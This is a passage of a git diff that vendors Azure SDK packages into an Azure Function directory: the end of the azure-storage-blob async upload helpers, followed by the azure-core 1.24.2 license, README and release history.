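+ # Client-side encryption: generate a content-encryption key (CEK) and IV, + # store the serialized key-wrapping metadata in the blob's + # 'x-ms-meta-encryptiondata' header, and pass the CEK/IV down so the + # chunk upload path can encrypt the data before sending.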
cek, iv, encryption_data = generate_blob_encryption_data(encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + encryption_options['cek'] = cek + encryption_options['vector'] = iv + block_ids = await upload_data_chunks( + service=client, + uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + else: + block_ids = await upload_substream_blocks( + service=client, + uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + + block_lookup = BlockLookupList(committed=[], uncommitted=[], latest=[]) + block_lookup.latest = block_ids + return await client.commit_block_list( + block_lookup, + blob_http_headers=blob_headers, + cls=return_response_headers, + validate_content=validate_content, + headers=headers, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +async def upload_page_blob( + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + if length is None or length < 0: + raise ValueError("A content length must be specified for a Page Blob.") + if length % 512 != 0: + raise ValueError("Invalid page blob size: {0}. 
" + "The size must be aligned to a 512-byte boundary.".format(length)) + if kwargs.get('premium_page_blob_tier'): + premium_page_blob_tier = kwargs.pop('premium_page_blob_tier') + try: + headers['x-ms-access-tier'] = premium_page_blob_tier.value + except AttributeError: + headers['x-ms-access-tier'] = premium_page_blob_tier + if encryption_options and encryption_options.get('data'): + headers['x-ms-meta-encryptiondata'] = encryption_options['data'] + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + response = await client.create( + content_length=0, + blob_content_length=length, + blob_sequence_number=None, + blob_http_headers=kwargs.pop('blob_headers', None), + blob_tags_string=blob_tags_string, + cls=return_response_headers, + headers=headers, + **kwargs) + if length == 0: + return response + + kwargs['modified_access_conditions'] = ModifiedAccessConditions(if_match=response['etag']) + return await upload_data_chunks( + service=client, + uploader_class=PageBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_page_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs) + + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +async def upload_append_blob( # pylint: disable=unused-argument + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if length == 0: + return {} + blob_headers = kwargs.pop('blob_headers', None) + append_conditions = AppendPositionAccessConditions( + max_size=kwargs.pop('maxsize_condition', None), + append_position=None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + try: + if overwrite: + await client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return await upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + if error.response.status_code != 404: + raise + # rewind the request body if it is a stream + if hasattr(stream, 'read'): + try: + # attempt to rewind the body to the initial position + stream.seek(0, SEEK_SET) + except UnsupportedOperation: + # if body is not seekable, then retry would not work + raise error + await client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return await upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/LICENSE new file mode 100644 index 0000000..4437826 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/LICENSE @@ -0,0 +1,21 @@ +Copyright (c) Microsoft Corporation. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. 
\ No newline at end of file
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/METADATA
new file mode 100644
index 0000000..3150f6f
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/METADATA
@@ -0,0 +1,794 @@
+Metadata-Version: 2.1
+Name: azure-core
+Version: 1.24.2
+Summary: Microsoft Azure Core Library for Python
+Home-page: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/core/azure-core
+Author: Microsoft Corporation
+Author-email: azpysdkhelp@microsoft.com
+License: MIT License
+Platform: UNKNOWN
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Programming Language :: Python
+Classifier: Programming Language :: Python :: 3 :: Only
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: License :: OSI Approved :: MIT License
+Requires-Python: >=3.6
+Description-Content-Type: text/markdown
+Requires-Dist: requests (>=2.18.4)
+Requires-Dist: six (>=1.11.0)
+Requires-Dist: typing-extensions (>=4.0.1)
+
+
+# Azure Core shared client library for Python
+
+Azure core provides shared exceptions and modules for Python SDK client libraries.
+These libraries follow the [Azure SDK Design Guidelines for Python](https://azure.github.io/azure-sdk/python/guidelines/index.html).
+
+If you are a client library developer, please reference the [client library developer reference](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/CLIENT_LIBRARY_DEVELOPER.md) for more information.
+
+[Source code](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/) | [Package (Pypi)][package] | [API reference documentation](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/)
+
+## _Disclaimer_
+
+_Azure SDK Python packages support for Python 2.7 has ended 01 January 2022. For more information and questions, please refer to https://github.com/Azure/azure-sdk-for-python/issues/20691_
+
+## Getting started
+
+Typically, you will not need to install azure core;
+it will be installed when you install one of the client libraries using it.
+In case you want to install it explicitly (to implement your own client library, for example),
+you can find it [here](https://pypi.org/project/azure-core/).
+
+## Key concepts
+
+### Azure Core Library Exceptions
+
+#### AzureError
+
+AzureError is the base exception for all errors.
+
+```python
+class AzureError(Exception):
+    def __init__(self, message, *args, **kwargs):
+        self.inner_exception = kwargs.get("error")
+        self.exc_type, self.exc_value, self.exc_traceback = sys.exc_info()
+        self.exc_type = self.exc_type.__name__ if self.exc_type else type(self.inner_exception)
+        self.exc_msg = "{}, {}: {}".format(message, self.exc_type, self.exc_value)  # type: ignore
+        self.message = str(message)
+        self.continuation_token = kwargs.get("continuation_token")
+        super(AzureError, self).__init__(self.message, *args)
+```
+
+*message* is any message (str) to be associated with the exception.
+
+*args* are any additional args to be included with the exception.
+
+*kwargs* are keyword arguments to include with the exception.
Use the keyword *error* to pass in an internal exception and *continuation_token* for a token reference to continue an incomplete operation.
+
+**The following exceptions inherit from AzureError:**
+
+#### ServiceRequestError
+
+An error occurred while attempting to make a request to the service. No request was sent.
+
+#### ServiceResponseError
+
+The request was sent, but the client failed to understand the response.
+The connection may have timed out. These errors can be retried for idempotent or safe operations.
+
+#### HttpResponseError
+
+A request was made, and a non-success status code was received from the service.
+
+```python
+class HttpResponseError(AzureError):
+    def __init__(self, message=None, response=None, **kwargs):
+        self.reason = None
+        self.response = response
+        if response:
+            self.reason = response.reason
+            self.status_code = response.status_code
+        self.error = self._parse_odata_body(ODataV4Format, response)  # type: Optional[ODataV4Format]
+        if self.error:
+            message = str(self.error)
+        else:
+            message = message or "Operation returned an invalid status '{}'".format(
+                self.reason
+            )
+
+        super(HttpResponseError, self).__init__(message=message, **kwargs)
+```
+
+*message* is the HTTP response error message (optional).
+
+*response* is the HTTP response (optional).
+
+*kwargs* are keyword arguments to include with the exception.
+
+**The following exceptions inherit from HttpResponseError:**
+
+#### DecodeError
+
+An error raised during response de-serialization.
+
+#### IncompleteReadError
+
+An error raised if the peer closes the connection before we have received the complete message body.
+
+#### ResourceExistsError
+
+An error response with status code 4xx. This will not be raised directly by the Azure core pipeline.
+
+#### ResourceNotFoundError
+
+An error response, typically triggered by a 412 response (for update) or 404 (for get/post).
+
+#### ResourceModifiedError
+
+An error response with status code 4xx, typically 412 (Precondition Failed). This will not be raised directly by the Azure core pipeline.
+
+#### ResourceNotModifiedError
+
+An error response with status code 304. This will not be raised directly by the Azure core pipeline.
+
+#### ClientAuthenticationError
+
+An error response with status code 4xx. This will not be raised directly by the Azure core pipeline.
+
+#### TooManyRedirectsError
+
+An error raised when the maximum number of redirect attempts is reached. The maximum number of redirects can be configured in the RedirectPolicy.
+
+```python
+class TooManyRedirectsError(HttpResponseError):
+    def __init__(self, history, *args, **kwargs):
+        self.history = history
+        message = "Reached maximum redirect attempts."
+        super(TooManyRedirectsError, self).__init__(message, *args, **kwargs)
+```
+
+*history* is used to document the requests/responses that resulted in redirected requests.
+
+*args* are any additional args to be included with the exception.
+
+*kwargs* are keyword arguments to include with the exception.
+
+#### StreamConsumedError
+
+An error thrown if you try to access the stream of `azure.core.rest.HttpResponse` or `azure.core.rest.AsyncHttpResponse` once
+the response stream has been consumed.
+
+#### StreamClosedError
+
+An error thrown if you try to access the stream of the `azure.core.rest.HttpResponse` or `azure.core.rest.AsyncHttpResponse` once
+the response stream has been closed.
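+
+As a hedged illustration of these stream-state errors (together with `ResponseNotReadError`, described next), the sketch below drives them through `azure.core.PipelineClient.send_request`. The endpoint URL and path are placeholders, not a real service.
+
+```python
+# Hedged sketch only: "example.invalid" is a placeholder endpoint.
+from azure.core import PipelineClient
+from azure.core.rest import HttpRequest
+from azure.core.exceptions import ResponseNotReadError, StreamClosedError
+
+client = PipelineClient(base_url="https://example.invalid")
+response = client.send_request(HttpRequest("GET", "/data"), stream=True)
+
+try:
+    response.content                  # body bytes were never read
+except ResponseNotReadError:
+    pass                              # call response.read() first to cache them
+
+response.close()
+try:
+    for _ in response.iter_raw():     # the underlying stream is closed
+        pass
+except StreamClosedError:
+    pass
+```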
+
+#### ResponseNotReadError
+
+An error thrown if you try to access the `content` of `azure.core.rest.HttpResponse` or `azure.core.rest.AsyncHttpResponse` before
+reading in the response's bytes first.
+
+### Configurations
+
+When calling the methods, some properties can be configured by passing them in as keyword arguments.
+
+| Parameters | Description |
+| --- | --- |
+| headers | The HTTP Request headers. |
+| request_id | The request id to be added into the header. |
+| user_agent | If specified, this will be added in front of the user agent string. |
+| logging_enable | Use to enable network trace logging per operation. Defaults to `False`. |
+| logger | If specified, it will be used to log information. |
+| response_encoding | The encoding to use if known for this service (will disable auto-detection). |
+| proxies | Dictionary mapping protocol or protocol and hostname to the URL of the proxy. |
+| raw_request_hook | Callback function. Will be invoked on request. |
+| raw_response_hook | Callback function. Will be invoked on response. |
+| network_span_namer | A callable to customize the span name. |
+| tracing_attributes | Attributes to set on all created spans. |
+| permit_redirects | Whether the client allows redirects. Defaults to `True`. |
+| redirect_max | The maximum allowed redirects. Defaults to `30`. |
+| retry_total | Total number of retries to allow. Takes precedence over other counts. Default value is `10`. |
+| retry_connect | How many connection-related errors to retry on. These are errors raised before the request is sent to the remote server, which we assume has not triggered the server to process the request. Default value is `3`. |
+| retry_read | How many times to retry on read errors. These errors are raised after the request was sent to the server, so the request may have side-effects. Default value is `3`. |
+| retry_status | How many times to retry on bad status codes. Default value is `3`. |
+| retry_backoff_factor | A backoff factor to apply between attempts after the second try (most errors are resolved immediately by a second try without a delay). The retry policy will sleep for `{backoff factor} * (2 ** ({number of total retries} - 1))` seconds. If the backoff_factor is 0.1, the retry will sleep for [0.0s, 0.2s, 0.4s, ...] between retries. The default value is `0.8`. |
+| retry_backoff_max | The maximum back off time. Default value is `120` seconds (2 minutes). |
+| retry_mode | Fixed or exponential delay between attempts, default is `Exponential`. |
+| timeout | Timeout setting for the operation in seconds, default is `604800`s (7 days). |
+| connection_timeout | A single float in seconds for the connection timeout. Defaults to `300` seconds. |
+| read_timeout | A single float in seconds for the read timeout. Defaults to `300` seconds. |
+| connection_verify | SSL certificate verification. Enabled by default. Set to False to disable, alternatively can be set to the path to a CA_BUNDLE file or directory with certificates of trusted CAs. |
+| connection_cert | Client-side certificates. You can specify a local cert to use as the client-side certificate, as a single file (containing the private key and the certificate) or as a tuple of both files' paths. |
+| cookies | Dict or CookieJar object to send with the `Request`. |
+| connection_data_block_size | The block size of data sent over the connection. Defaults to `4096` bytes. |
+
+### Async transport
+
+The async transport is designed to be opt-in.
[AioHttp](https://pypi.org/project/aiohttp/) is one of the supported implementations of async transport. It is not installed by default. You need to install it separately.
+
+### Shared modules
+
+#### MatchConditions
+
+MatchConditions is an enum to describe match conditions.
+
+```python
+class MatchConditions(Enum):
+    Unconditionally = 1
+    IfNotModified = 2
+    IfModified = 3
+    IfPresent = 4
+    IfMissing = 5
+```
+
+#### CaseInsensitiveEnumMeta
+
+A metaclass to support case-insensitive enums.
+
+```python
+from enum import Enum
+from six import with_metaclass
+
+from azure.core import CaseInsensitiveEnumMeta
+
+class MyCustomEnum(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
+    FOO = 'foo'
+    BAR = 'bar'
+```
+
+#### Null Sentinel Value
+
+A falsy sentinel object which is intended to be used to specify attributes
+with no data. This gets serialized to `null` on the wire.
+
+```python
+from azure.core.serialization import NULL
+
+assert bool(NULL) is False
+
+foo = Foo(
+    attr=NULL
+)
+```
+
+## Contributing
+
+This project welcomes contributions and suggestions. Most contributions require
+you to agree to a Contributor License Agreement (CLA) declaring that you have
+the right to, and actually do, grant us the rights to use your contribution.
+For details, visit [https://cla.microsoft.com](https://cla.microsoft.com).
+
+When you submit a pull request, a CLA-bot will automatically determine whether
+you need to provide a CLA and decorate the PR appropriately (e.g., label,
+comment). Simply follow the instructions provided by the bot. You will only
+need to do this once across all repos using our CLA.
+
+This project has adopted the
+[Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
+For more information, see the
+[Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/)
+or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any
+additional questions or comments.
+
+
+[package]: https://pypi.org/project/azure-core/
+
+
+# Release History
+
+## 1.24.2 (2022-06-30)
+
+### Bugs Fixed
+
+- Fixed a bug where azure-core could not be imported under Python 3.11.0b3 #24928
+- `ContentDecodePolicy` can now correctly deserialize more JSON bodies with different mime types #22410
+
+## 1.24.1 (2022-06-01)
+
+### Bugs Fixed
+
+- Declare method-level span as INTERNAL by default #24492
+- Fixed type hints for `azure.core.paging.ItemPaged` #24548
+
+## 1.24.0 (2022-05-06)
+
+### Features Added
+
+- Add `SerializationError` and `DeserializationError` in `azure.core.exceptions` for errors raised during serialization / deserialization #24312
+
+## 1.23.1 (2022-03-31)
+
+### Bugs Fixed
+
+- Allow stream inputs to the `content` kwarg of `azure.core.rest.HttpRequest` from objects with a `read` method #23578
+
+## 1.23.0 (2022-03-03)
+
+### Features Added
+
+- Improve intellisense type hinting for service client methods. #22891
+
+- Add a case insensitive dict `case_insensitive_dict` in `azure.core.utils`. #23206
+
+### Bugs Fixed
+
+- Use "\n" rather than "/n" for new line in log. #23261
+
+### Other Changes
+
+- Log "WWW-Authenticate" header in `HttpLoggingPolicy` #22990
+- Added dependency on `typing-extensions` >= 4.0.1
+
+## 1.22.1 (2022-02-09)
+
+### Bugs Fixed
+
+- Limiting `final-state-via` scope to POST until consuming SDKs have been fixed to use this option properly on PUT. #22989
+
+## 1.22.0 (2022-02-03)
+_[**This version is deprecated.**]_
+
+### Features Added
+
+- Add support for `final-state-via` LRO option in core.
#22713 + +### Bugs Fixed + +- Add response body to string representation of `HttpResponseError` if we're not able to parse out information #22302 +- Raise `AttributeError` when calling azure.core.pipeline.transport.\_\_bases__ #22469 + +### Other Changes + +- Python 2.7 is no longer supported. Please use Python version 3.6 or later. + +## 1.21.1 (2021-12-06) + +### Other Changes + +- Revert change in str method #22023 + +## 1.21.0 (2021-12-02) + +### Breaking Changes + +- Sync stream downloading now raises `azure.core.exceptions.DecodeError` rather than `requests.exceptions.ContentDecodingError` + +### Bugs Fixed + +- Add response body to string representation of `HttpResponseError` if we're not able to parse out information #21800 + +## 1.20.1 (2021-11-08) + +### Bugs Fixed + +- Correctly set response's content to decompressed body when users are using aiohttp transport with decompression headers #21620 + +## 1.20.0 (2021-11-04) + +### Features Added + +- GA `send_request` onto the `azure.core.PipelineClient` and `azure.core.AsyncPipelineClient`. This method takes in +requests and sends them through our pipelines. +- GA `azure.core.rest`. `azure.core.rest` is our new public simple HTTP library in `azure.core` that users will use to create requests, and consume responses. +- GA errors `StreamConsumedError`, `StreamClosedError`, and `ResponseNotReadError` to `azure.core.exceptions`. These errors +are thrown if you mishandle streamed responses from the `azure.core.rest` module +- add kwargs to the methods for `iter_raw` and `iter_bytes` #21529 +- no longer raise JSON errors if users pass in file descriptors of JSON to the `json` kwarg in `HttpRequest` #21504 +- Added new error type `IncompleteReadError` which is raised if peer closes the connection before we have received the complete message body. + +### Breaking Changes + +- SansIOHTTPPolicy.on_exception returns None instead of bool. + +### Bugs Fixed + +- The `Content-Length` header in a http response is strictly checked against the actual number of bytes in the body, + rather than silently truncating data in case the underlying tcp connection is closed prematurely. + (thanks to @jochen-ott-by for the contribution) #20412 +- UnboundLocalError when SansIOHTTPPolicy handles an exception #15222 +- Add default content type header of `text/plain` and content length header for users who pass unicode strings to the `content` kwarg of `HttpRequest` in 2.7 #21550 + +## 1.19.1 (2021-11-01) + +### Bugs Fixed + +- respect text encoding specified in argument (thanks to @ryohji for the contribution) #20796 +- Fix "coroutine x.read() was never awaited" warning from `ContentDecodePolicy` #21318 +- fix type check for `data` input to `azure.core.rest` for python 2.7 users #21341 +- use `charset_normalizer` if `chardet` is not installed to migrate aiohttp 3.8.0 changes. + +### Other Changes + +- Refactor AzureJSONEncoder (thanks to @Codejune for the contribution) #21028 + +## 1.19.0 (2021-09-30) + +### Breaking Changes in the Provisional `azure.core.rest` package + +- `azure.core.rest.HttpResponse` and `azure.core.rest.AsyncHttpResponse` are now abstract base classes. They should not be initialized directly, instead +your transport responses should inherit from them and implement them. 
+- The properties of the `azure.core.rest` responses are now all read-only
+
+### Features Added
+
+- HttpLoggingPolicy integrates logs into one record #19925
+
+## 1.18.0 (2021-09-02)
+
+### Features Added
+
+- `azure.core.serialization.AzureJSONEncoder` (introduced in 1.17.0) serializes `datetime.datetime` objects in ISO 8601 format, conforming to RFC 3339's specification. #20190
+- We now use `azure.core.serialization.AzureJSONEncoder` to serialize `json` input to `azure.core.rest.HttpRequest`.
+
+### Breaking Changes in the Provisional `azure.core.rest` package
+
+- The `text` property on `azure.core.rest.HttpResponse` and `azure.core.rest.AsyncHttpResponse` has changed to a method, which also takes
+an `encoding` parameter.
+- Removed `iter_text` and `iter_lines` from `azure.core.rest.HttpResponse` and `azure.core.rest.AsyncHttpResponse`
+
+### Bugs Fixed
+
+- The behaviour of the headers returned in `azure.core.rest` responses now aligns across sync and async. Items can now be checked case-insensitively and without raising an error for format.
+
+## 1.17.0 (2021-08-05)
+
+### Features Added
+
+- Cut hard dependency on requests library
+- Added a `from_json` method which now accepts storage QueueMessage, eventhub's EventData or ServiceBusMessage or simply json bytes to return a `CloudEvent`
+
+### Fixed
+
+- Do not override "x-ms-client-request-id" if it already exists in the header. #17757
+
+### Breaking Changes in the Provisional `azure.core.rest` package
+
+- `azure.core.rest` will not try to guess the `charset` anymore if it was impossible to extract it from `HttpResponse` analysis. This removes our dependency on `chardet`.
+
+## 1.16.0 (2021-07-01)
+
+### Features Added
+
+- Add new ***provisional*** methods `send_request` onto the `azure.core.PipelineClient` and `azure.core.AsyncPipelineClient`. This method takes in
+requests and sends them through our pipelines.
+- Add new ***provisional*** module `azure.core.rest`. `azure.core.rest` is our new public simple HTTP library in `azure.core` that users will use to create requests, and consume responses.
+- Add new ***provisional*** errors `StreamConsumedError`, `StreamClosedError`, and `ResponseNotReadError` to `azure.core.exceptions`. These errors
+are thrown if you mishandle streamed responses from the provisional `azure.core.rest` module
+
+### Fixed
+
+- Improved error message in the `from_dict` method of `CloudEvent` when a wrong schema is sent.
+
+## 1.15.0 (2021-06-04)
+
+### New Features
+
+- Added `BearerTokenCredentialPolicy.on_challenge` and `.authorize_request` to allow subclasses to optionally handle authentication challenges
+
+### Bug Fixes
+
+- Retry policies don't sleep after operations time out
+- The `from_dict` method in the `CloudEvent` can now convert a datetime string to a datetime object when the microsecond exceeds the Python limitation
+
+## 1.14.0 (2021-05-13)
+
+### New Features
+
+- Added `azure.core.credentials.AzureNamedKeyCredential` credential #17548.
+- Added `decompress` parameter for `stream_download` method. If it is set to `False`, will not do decompression upon the stream. #17920
+
+## 1.13.0 (2021-04-02)
+
+Azure core requires Python 2.7 or Python 3.6+ since this release.
+
+### New Features
+
+- Added `azure.core.utils.parse_connection_string` function to parse connection strings across SDKs, with common validation and support for case insensitive keys.
+- Supported adding custom policies #16519
+- Added `~azure.core.tracing.Link` that should be used while passing `Links` to `AbstractSpan`.
+- `AbstractSpan` constructor can now take in additional keyword only args.
+
+### Bug fixes
+
+- Make NetworkTraceLoggingPolicy show the auth token in plain text. #14191
+- Fixed RetryPolicy overriding default connection timeout with an extreme value #17481
+
+## 1.12.0 (2021-03-08)
+
+This version will be the last version to officially support Python 3.5, future versions will require Python 2.7 or Python 3.6+.
+
+### Features
+
+- Added `azure.core.messaging.CloudEvent` model that follows the cloud event spec.
+- Added `azure.core.serialization.NULL` sentinel value
+- Improve `repr`s for `HttpRequest` and `HttpResponse`s #16972
+
+### Bug Fixes
+
+- Disable retry in stream downloading. (thanks to @jochen-ott-by @hoffmann for the contribution) #16723
+
+## 1.11.0 (2021-02-08)
+
+### Features
+
+- Added `CaseInsensitiveEnumMeta` class for case-insensitive enums. #16316
+- Add `raise_for_status` method onto `HttpResponse`. Calling `response.raise_for_status()` on a response with an error code
+will raise an `HttpResponseError`. Calling it on a good response will do nothing #16399
+
+### Bug Fixes
+
+- Update conn.conn_kw rather than overriding it when setting block size. (thanks to @jiasli for the contribution) #16587
+
+## 1.10.0 (2021-01-11)
+
+### Features
+
+- Added `AzureSasCredential` and its respective policy. #15946
+
+## 1.9.0 (2020-11-09)
+
+### Features
+
+- Add a `continuation_token` attribute to the base `AzureError` exception, and set this value for errors raised
+  during paged or long-running operations.
+
+### Bug Fixes
+
+- Set retry_interval to 1 second instead of 1000 seconds (thanks **vbarbaresi** for contributing) #14357
+
+
+## 1.8.2 (2020-10-05)
+
+### Bug Fixes
+
+- Fixed bug to allow polling in the case of parameterized endpoints with relative polling urls #14097
+
+
+## 1.8.1 (2020-09-08)
+
+### Bug fixes
+
+- SAS credential replicated "/" fix #13159
+
+## 1.8.0 (2020-08-10)
+
+### Features
+
+- Support params as list for exploding parameters #12410
+
+
+## 1.7.0 (2020-07-06)
+
+### Bug fixes
+
+- `AzureKeyCredentialPolicy` will now accept (and ignore) passed in kwargs #11963
+- Better error messages if passed endpoint is incorrect #12106
+- Do not JSON encode a string if content type is "text" #12137
+
+### Features
+
+- Added `http_logging_policy` property on the `Configuration` object, allowing users to individually
+set the http logging policy of the config #12218
+
+## 1.6.0 (2020-06-03)
+
+### Bug fixes
+
+- Fixed deadlocks in AsyncBearerTokenCredentialPolicy #11543
+- Fix AttributeError in StreamDownloadGenerator #11462
+
+### Features
+
+- Added support for changesets as part of multipart message support #10485
+- Add AsyncLROPoller in azure.core.polling #10801
+- Add get_continuation_token/from_continuation_token/polling_method methods in pollers (sync and async) #10801
+- HttpResponse and PipelineContext objects are now picklable #10801
+
+## 1.5.0 (2020-05-04)
+
+### Features
+
+- Support "x-ms-retry-after-ms" in response header #10743
+- `link` and `link_from_headers` now accepts attributes #10765
+
+### Bug fixes
+
+- Do not retry if the status code is less than 400 #10778
+- "x-ms-request-id" is not considered safe header for logging #10967
+
+## 1.4.0 (2020-04-06)
+
+### Features
+
+- Support a default error type in map_error #9773
+- Added `AzureKeyCredential` and its respective policy.
#10509
+- Added `azure.core.polling.base_polling` module with a "Microsoft One API" polling implementation #10090
+  Also contains the async version in `azure.core.polling.async_base_polling`
+- Support kwarg `enforce_https` to disable HTTPS check on authentication #9821
+- Support additional kwargs in `HttpRequest.set_multipart_mixed` that will be passed into pipeline context.
+
+## 1.3.0 (2020-03-09)
+
+### Bug fixes
+
+- Appended RequestIdPolicy to the default pipeline #9841
+- Rewind the body position in async_retry #10117
+
+### Features
+
+- Add raw_request_hook support in custom_hook_policy #9958
+- Add timeout support in retry_policy #10011
+- Add OdataV4 error format auto-parsing in all exceptions ('error' attribute) #9738
+
+## 1.2.2 (2020-02-10)
+
+### Bug fixes
+
+- Fixed a bug that sent None as request_id #9545
+- Enable mypy for customers #9572
+- Handle TypeError in deep copy #9620
+- Fix text/plain content-type in decoder #9589
+
+## 1.2.1 (2020-01-14)
+
+### Bug fixes
+
+- Fixed a regression in 1.2.0 that was incompatible with azure-keyvault-* 4.0.0
+[#9462](https://github.com/Azure/azure-sdk-for-python/issues/9462)
+
+
+## 1.2.0 (2020-01-14)
+
+### Features
+
+- Add user_agent & sdk_moniker kwargs in UserAgentPolicy init #9355
+- Support OPTIONS HTTP verb #9322
+- Add tracing_attributes to tracing decorator #9297
+- Support auto_request_id in RequestIdPolicy #9163
+- Support fixed retry #6419
+- Support "retry-after-ms" in response header #9240
+
+### Bug fixes
+
+- Removed `__enter__` and `__exit__` from async context managers #9313
+
+## 1.1.1 (2019-12-03)
+
+### Bug fixes
+
+- Bearer token authorization requires HTTPS
+- Rewind the body position in retry #8307
+
+## 1.1.0 (2019-11-25)
+
+### Features
+
+- New RequestIdPolicy #8437
+- Enable logging policy in default pipeline #8053
+- Normalize transport timeout. #8000
+  Now we have:
+  * 'connection_timeout' - a single float in seconds for the connection timeout. Default 5min
+  * 'read_timeout' - a single float in seconds for the read timeout. Default 5min
+
+### Bug fixes
+
+- RequestHistory: deepcopy fails if request contains a stream #7732
+- Retry: retry raises error if response does not have http_response #8629
+- Client kwargs are now passed to DistributedTracingPolicy correctly #8051
+- NetworkLoggingPolicy now logs correctly all requests in case of retry #8262
+
+## 1.0.0 (2019-10-29)
+
+### Features
+
+- Tracing: DistributedTracingPolicy now accepts kwargs network_span_namer to change network span name #7773
+- Tracing: Implementation of AbstractSpan can now use the mixin HttpSpanMixin to get HTTP span update automatically #7773
+- Tracing: AbstractSpan contract "change_context" introduced #7773
+- Introduce new policy HttpLoggingPolicy #7988
+
+### Bug fixes
+
+- Fix AsyncioRequestsTransport if input stream is an async generator #7743
+- Fix form-data with aiohttp transport #7749
+
+### Breaking changes
+
+- Tracing: AbstractSpan.set_current_span is no longer supported. Use change_context instead.
#7773
+- azure.core.pipeline.policies.ContentDecodePolicy.deserialize_from_text changed
+
+## 1.0.0b4 (2019-10-07)
+
